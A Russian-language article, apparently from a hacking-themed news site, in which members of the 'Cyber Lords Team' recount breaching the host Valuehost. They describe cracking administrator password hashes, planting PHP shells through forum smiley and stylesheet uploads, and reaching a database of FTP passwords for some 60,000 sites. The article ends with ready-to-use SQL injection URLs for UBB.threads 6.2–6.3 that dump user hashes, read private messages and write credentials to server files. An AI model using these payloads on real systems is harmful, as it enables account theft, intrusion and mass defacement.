Уже как несколько месяцев весь рунет
стоит на ушах из-за того, что один из самый
известных русских хостеров (valuehost) был
взломан. Сейчас я вам расскажу как всё было…
Всё произошло примерно пол года назад. Как-то
в один прекрасный день мы узнали, что один
из мемберов нашей тимы (w00t) нашёл уязвимость
в форуме UBB.threads 6.2.*-6.3.*. Это была обычная
инъекция, которой за считанные секунды
можно было получить хеши всех
администраторов и пользователей форума.

Вот и сама уязвимость, которая принесла
большие траблы админам валуе =) (Все
респекты Вут’у =)): (багу мы выкладывали на
паре известных форумов, но это была самая
грубая ошибка, некоторые личности ей и
увели базу, что привело к масс дефейсу
известных русских сайтов и раздаче базы «кому
попало»).

http://urlubb.com/showmembers.php?Cat=&like=
1’%20union%20SELECT%20U_LoginName,U_Registered,
U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_ Number%20FROM%20w3t_Users%20WHERE%
20U_Status=’Administrator’/*

После того, как мы увидели хеши админов
форума в кодировке MD5, в дело пошёл обычный
брутфорсер — MD5 Inside. Оказалось, что админы
зачем-то зарегали 5 админов, причём
появлялись на форуме максимум 1-2. Ещё они не
дружат со сложными пассами 🙂 За час мы
расшифровали парочку админских пассов (помнится
мне, что у одного был пароль 1234567890 %). По
началу казалось, что это ничего не даст, так
как админы таких крупных хостеров не
ламоразмы и прав на запись не оставляют, но
эти оказались особыми 🙂 Права на запись
смайлов были не прикрыты /images/icons/. В
результате в админке форума был залит php
шелл через смайлик. Как вы понимаете,
валуехост оставалось недолго жить на свете…
=) 

Пару ночей мы рылись в исходниках и
изучали прелести валуехоста 🙂 В конфиге
достали пароль от главной базы. Далее
залили на валуе скрипт для просмотра БД и
спокойно вошли в неё. Там нас ожидало очень
много интересного. FTP  пассы в открытом
виде, инфа владельцев доменов и разная
прочая фигня лежала в огромной базе с 60.000
сайтами. 

Прошло полгода, доступ к базе был у нас до
сих пор! Некоторые личности приобретшие
базу начали раздавать её и появлялось
множество якобы «дефейсов» кульных
сайтов. Поступало много звонков к админам,
что вот их отымели, но сперва они думали, что
это полный бред и отвечали по телефону: «Взлом
нашего сервера невозможен, это исключено».

Как-то раз после учёбы вечерком сожусь за
комп и от одного из мемберов узнаю, что
админы вышли из долгой спячки (которая
длилась пол года) и поприкрывали всё нахрен.
Лично я был немного рад, что наконец-то
прекратятся эти бесконечные «дефейсы»,
но всё равно в душе было немного жалко
потерять доступ к такой огромной БД ;). И тут
мы разгорелись желанием всё-таки вернуть
эту базу, не для дефейсов, не для продажи, а
для интереса. Valuehost были как всегда на
высоте в своей тупизне ). Инъекцию на форуме
они не прикрыли, а просто снесли все наши
«потайные ходы (шеллы, нужные инструменты
=))и убрали права на запись в /icons/… 

После двух часов расшифровки очередных
админских хешей форума мы нашли ещё одного
«любителя маленьких паролей».
Очередной раз мы в админке, через смайл шелл
залить нельзя, пишет права нету у тебя, тут в
админке UBB я нашёл ещё одну мазу — добавлять
стили или редактировать их. Админы прикрыли
права на /icons/, а /stylesheets/ прикрыть они не
догадались (просто добавлять или
редактировать стили форума и делать шелл).
После 15 минут смеха мы опять каким-то
макаром лазали по базе как по своей :)…

Но не всё так радостно. Через несколько дней
все наши шеллы поприкрывали и самое главное
— их форум UBB был снесён окончательно. ИМХО
главный директор ВалуеХост открыл глаза и
выгнал этих недоумков с работы, нанял умных
людей. Пусть это служит уроком для
администраторов серваков, которые любят
поставить на свой ресурс что-то публичное
вместо того, что бы посидеть и написать свой
двиг, чьи сорцы будут никому неизвестны :).
Ну а насчёт паролей тут уже говорить нечего,
ставить на такой умопомрачительный хостер
5-значный пасс просто ЛОЛ…

Ну а вот все уязвимости UBB.threads 6.2.*-6.3.*
найденными нами (Cyber Lords Team):

1. Выводим логины и хеши паролей всех юзеров…

http://forum.ru/showmembers.php?Cat=&like=
1’%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users/*
http://forum.ru/showmembers.php?Cat=&like=
1’%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users where
U_Status=’Administrator’/*

Выводим пассы всех админов… Заменяем
Administrator на Moderator и получаем тоже тока для
модеров….

2. Читаем чужие приваты…

http://forum.ru/viewmessage.php?Cat=&message=
1%20or%201=1%20and%20t1.M_Number= ТУТ ПИШЕМ НОМЕР ПРИВАТА
КОТОРЫЙ ХОТИМ ПОЧИТАТЬ/*

Например:

http://forum.ru/viewmessage.php?Cat=&message=
1%20or%201=1%20and%20t1.M_Number=3/*

3. Пишем все логины с паролями в файл на
серваке:

http://forum.ru/viewmessage.php?Cat=&message=
999999999%20union%20select%20U_LoginName, 0,0,0,0,U_Password%20from%20w3t_Users%
20where%201=1%20into%20outfile%20’/ПУТЬ ДО ФОРУМА/images/icons/info.txt’/*

Путь можно узнать так: http://31337.org/showmembers.php?Cat=&like=0′
— вылезет ошибка и там видно путь…

4. Получаем список логинов всех юзеров..

http://forum.ru/showflat.php?Cat=&Number
=999999%20union%20select%200,U_Login Name%20from%20w3t_Users%20where%2
01=1%20into%20outfile%20′ /var/www/html/forum/images/icons/info1.txt’

Меняем U_LoginName на U_Password, info1.txt на info2.txt и в
файле info2.txt получаем пасы всех юзеров…
Примерно так:

http://forum.ru/images/icons/info2.txt

P.S. Иногда надо регаться чтобы бага
прокатила, а иногда не надо… Всё зависит от
настроек форума..

We are: Condor, k0pa, w00t, _SPiRiT_, Xterm, DiorR..

http://www.cyberlords.net
irc.phey.net

Оставить мнение

Check Also

Каждый пятый магазин, пострадавший от MageCart, заражают повторно через несколько дней

Независимый ИБ-эксперт Виллем де Грот (Willem de Groot) предупреждает, что сайты, подвергш…